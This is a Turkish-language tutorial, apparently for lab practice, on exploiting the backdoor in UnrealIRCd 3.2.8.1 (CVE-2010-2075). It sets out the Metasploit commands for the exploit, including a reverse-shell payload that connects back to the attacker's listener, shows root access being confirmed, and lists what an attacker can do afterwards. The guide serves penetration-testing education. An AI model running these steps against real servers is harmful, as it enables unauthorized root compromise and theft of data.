UnrealIRCd Backdoor Zafiyeti

 

UnrealIRCd Backdoor Zafiyeti (CVE-2010-2075)

Bu zafiyet 6667 portunun kullandığı UnrealIRCd servisidir. 2009-2010 yılları arasında UnrealIRCd'nin belirli mirror sitelerinden indirilen kaynak koduna gizlice eklenmiş bir trojan horse (Truva atı) içeriyor. Backdoor, IRC protokolü üzerinden "AB;" ile başlayan komutları işleyerek uzaktan kod çalıştırmaya izin veriyor. Bu sayede, hedefte komut çalıştırabilir, reverse shell açabilir veya dosya indirebilirsiniz.

Sömürme aşaması;

nmap ile hedef cihazımızın 6667 portunun servisini doğruluyoruz. Görüldüğü üzere portumuzda UnrealIRcd servisini kullanıyor.

Zafiyet Detayları

• CVE: CVE-2010-2075

• Etkilenen Sürüm: UnrealIRCd 3.2.8.1 

• Etki: Uzaktan kod çalıştırma (RCE) – Sistem komutları çalıştırılabilir, ancak çıktı doğrudan dönmez.

• Trigger: Sunucuya "AB;" şeklinde veri gönderin 

Metasploit ile Sömürü

İlk olarak terminalimizde sudo msfconsole komutu ile yönetici olarak msfconsole’yi çalıştırıyoruz.

Daha sonra modülümüzü yüklemek için gerekli olan komutu “use exploit/unix/irc/unreal_ircd_3281_backdoor” giriyoruz.

Gerekli ayarlarmaları yapıyoruz;

set RHOSTS 

set RPORT 6667

set LHOST 

set LPORT 4444

set PAYLOAD cmd/unix/reverse

Exploit

RHOSTS: Hedef(ler)in IP adresi veya adres aralığı. Exploit’in hangi hedef makineleri deneyeceğini belirtir (tek IP, CIDR aralığı veya virgülle ayrılmış liste olabilir).

RPORT: Hedefteki servis/port numarası. Örneğin 6667 genelde IRC servisinin standart portudur. Exploit bu port üzerinden hedef servise bağlanmaya çalışır.

LHOST: Yerel (saldırgan/analist) makinenizin IP adresi — hedefin ters bağlantı (reverse) kuracağı adres. Payload bu IP’ye geri bağlanır.

LPORT: Yerel makinede dinlenecek port numarası. Hedefin geri bağlanacağı porttur; payload bağlandığında bu port üzerinden iletişim sağlanır.

PAYLOAD: Hedefe gönderilecek “yük” türü. Örneğin cmd/unix/reverse konsept olarak hedefte bir komut kabuğu başlatıp LHOST:LPORT’ye geri bağlantı kurmayı amaçlayan bir Unix reverse payload’ıdır.

Exploit: Metasploit’te ayarlanmış parametrelere göre seçili exploit modülünü çalıştırma komutu. Belirlenen RHOSTS, RPORT, LHOST, LPORT, PAYLOAD vb. kullanılarak istismar denemesi başlatılır.

Gerekli ayarlamaları yapıp Exploit ettikten sonra başarılı bir şekilde command shell session açtık. burada yetkimzi kontrol etmek için whoami komutunu çalıştırıyoruz ve görüldüğü üzere root kullanıcı

UnrealIRCd (CVE-2010-2075) istismarıyla elde edilen root erişimi, saldırganın sistem üzerinde tam kontrol sahibi olduğu ve hem veri bütünlüğünü hem de gizliliği ciddi şekilde ihlal edebileceği anlamına gelir.

Saldırganın potansiyel amaçları ve yapabilecekleri 

• Tam sistem kontrolü: tüm dosyalara erişim, yapılandırma ve servislerde değişiklik yapabilme yetkisi.
  
  

• Kalıcılık sağlama (persistence): sistem yeniden başlasa bile tekrar erişim elde edebilmek için kalıcı yöntemler yerleştirme riski.
  
  

• Kimlik bilgileri ve anahtar hırsızlığı: SSH anahtarları, veritabanı/parola bilgileri, uygulama/CI/CD gizli anahtarlarının ele geçirilmesi.
  
  

• Ağ içi hareket (lateral movement): ele geçirilen makinadan ağ içindeki diğer sistemlere erişimi genişletme girişimleri.
  
  

• Delil gizleme ve log manipülasyonu: izleri silme veya loglarda değişiklik yaparak tespit edilmeyi zorlaştırma.

• Arka kapı/komut kontrol kanalı kurma: uzaktan komut alıp çalıştırabilecek gizli iletişim kanalları oluşturma ihtimali.